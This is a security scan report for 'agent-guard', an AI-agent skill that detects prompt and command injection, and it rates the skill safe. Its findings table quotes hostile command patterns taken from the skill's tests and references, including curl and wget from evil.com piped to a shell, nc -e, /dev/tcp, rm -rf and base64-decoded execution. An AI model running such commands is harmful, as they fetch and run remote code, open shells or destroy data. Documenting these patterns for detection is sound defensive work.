Trusted — Risk Score 0/100
Last scan: 1 day ago
agent-guard
Real-time prompt injection and command injection detection for AI agents
AgentGuard is a legitimate defensive security tool that provides pattern-based detection for prompt injection and command injection attacks. All flagged IOCs are documented threat patterns within test cases and reference documentation, not actual malicious behavior.
Skill Name: agent-guard
Duration: 38.2s
Engine: pi
Safe to install
This skill is safe to use. It performs text analysis only and does not execute any external commands, access credentials, or make network requests.
Resource      Declared  Inferred  Status     Evidence
Filesystem    READ      READ      ✓ Aligned  Only reads CLI text input for analysis
Network       NONE      NONE                 No network operations - only pattern matching on input text
Shell         NONE      NONE                 subprocess only used in test files for CLI testing
Environment   NONE      NONE                 No environment variable access
Clipboard     NONE      NONE                 No clipboard access
Browser       NONE      NONE                 No browser operations
Database      NONE      NONE                 No database access
Skill Invoke  NONE      NONE                 No skill invocation
Findings: 36 (23 Critical, 13 Medium)

Finding categories:
💀 Dangerous Command: dangerous shell command
🔒 Encoded Execution: Base64-encoded execution (code obfuscation)
🔗 External URL: external URL

Severity · Category · Location · Pattern
Critical · Dangerous Command · SKILL.md:90 · curl | bash
Critical · Dangerous Command · SKILL.md:90 · wget | sh
Critical · Dangerous Command · SKILL.md:110 · nc -l
Critical · Dangerous Command · SKILL.md:110 · /dev/tcp/
Critical · Dangerous Command · references/false-positives.md:33 · rm -rf /
Critical · Dangerous Command · references/threat-patterns.md:15 · curl ... \| bash
Critical · Dangerous Command · references/threat-patterns.md:15 · curl https://evil.com/setup.sh \| bash
Critical · Dangerous Command · references/threat-patterns.md:16 · wget ... \| sh
Critical · Dangerous Command · references/threat-patterns.md:16 · wget https://evil.com/install.sh \| sh
Critical · Dangerous Command · references/threat-patterns.md:17 · rm -rf ~
Critical · Dangerous Command · references/threat-patterns.md:30 · python -c "import os
Critical · Dangerous Command · references/threat-patterns.md:130 · nc -e
Critical · Encoded Execution · references/threat-patterns.md:147 · base64 -d
Critical · Encoded Execution · references/threat-patterns.md:150 · Buffer.from(x, "base64"
Critical · Dangerous Command · references/threat-patterns.md:164 · curl evil.com | bash
Critical · Dangerous Command · tests/test_agent_guard.py:129 · curl https://evil.com/payload.sh | bash
Critical · Dangerous Command · tests/test_agent_guard.py:133 · wget https://evil.com/script.sh | sh
Critical · Dangerous Command · tests/test_agent_guard.py:167 · curl https://evil.com/backdoor.sh | bash
Critical · Encoded Execution · tests/test_agent_guard.py:377 · Buffer.from("cm0gLXJmIC8=", "base64"
Critical · Dangerous Command · tests/test_agent_guard.py:418 · curl -sSL https://raw.githubusercontent.com/malicious/repo/main/install.sh | bash
Critical · Dangerous Command · tests/test_agent_guard.py:567 · curl https://evil.com | bash
Critical · Dangerous Command · tests/test_agent_guard.py:704 · curl https://evil.com/setup.sh | bash
Critical · Dangerous Command · tests/test_agent_guard.py:708 · wget https://evil.com/install.sh | sh
Medium · External URL · references/threat-patterns.md:15 · https://evil.com/setup.sh
Medium · External URL · references/threat-patterns.md:16 · https://evil.com/install.sh
Medium · External URL · references/threat-patterns.md:21 · https://evil.com/pkg.tgz
Medium · External URL · references/threat-patterns.md:22 · https://evil.com/simple
Medium · External URL · references/threat-patterns.md:29 · http://evil.com/file.exe
Medium · External URL · tests/test_agent_guard.py:129 · https://evil.com/payload.sh
Medium · External URL · tests/test_agent_guard.py:133 · https://evil.com/script.sh
Medium · External URL · tests/test_agent_guard.py:155 · https://evil.com/malicious-pkg.tgz
Medium · External URL · tests/test_agent_guard.py:167 · https://evil.com/backdoor.sh
Medium · External URL · tests/test_agent_guard.py:341 · https://evil.com/collect
Medium · External URL · tests/test_agent_guard.py:349 · https://malicious.onion/payload
Medium · External URL · tests/test_agent_guard.py:567 · https://evil.com
Medium · External URL · tests/test_agent_guard.py:740 · https://evil.com/upload

File Tree

6 files · 101.7 KB · 2451 lines
Python: 2 files · 1995 lines; Markdown: 3 files · 450 lines; Shell: 1 file · 6 lines
├─ 📁 references
│ ├─ 📝 false-positives.md Markdown 104L · 5.2 KB
│ └─ 📝 threat-patterns.md Markdown 186L · 8.9 KB
├─ 📁 scripts
│ ├─ 🐍 agent_guard.py Python 1040L · 40.3 KB
│ └─ 🔧 scan.sh Shell 6L · 232 B
├─ 📁 tests
│ └─ 🐍 test_agent_guard.py Python 955L · 38.1 KB
└─ 📝 SKILL.md Markdown 160L · 8.9 KB

Security Positives

✓ Pure pattern-matching security tool with no actual execution of dangerous commands
✓ No credential harvesting, environment variable reading, or sensitive file access
✓ No network requests - only detects network-related patterns in input text
✓ Subprocess used only in test files to verify CLI output (legitimate testing)
✓ All flagged IOCs in pre-scan are documented threat patterns in SKILL.md, reference docs, and test files - not actual malicious behavior
✓ LRU caching and rate limiting implemented for performance
✓ Signal-based timeout protection against ReDoS attacks
✓ Comprehensive documentation of known limitations and false positive handling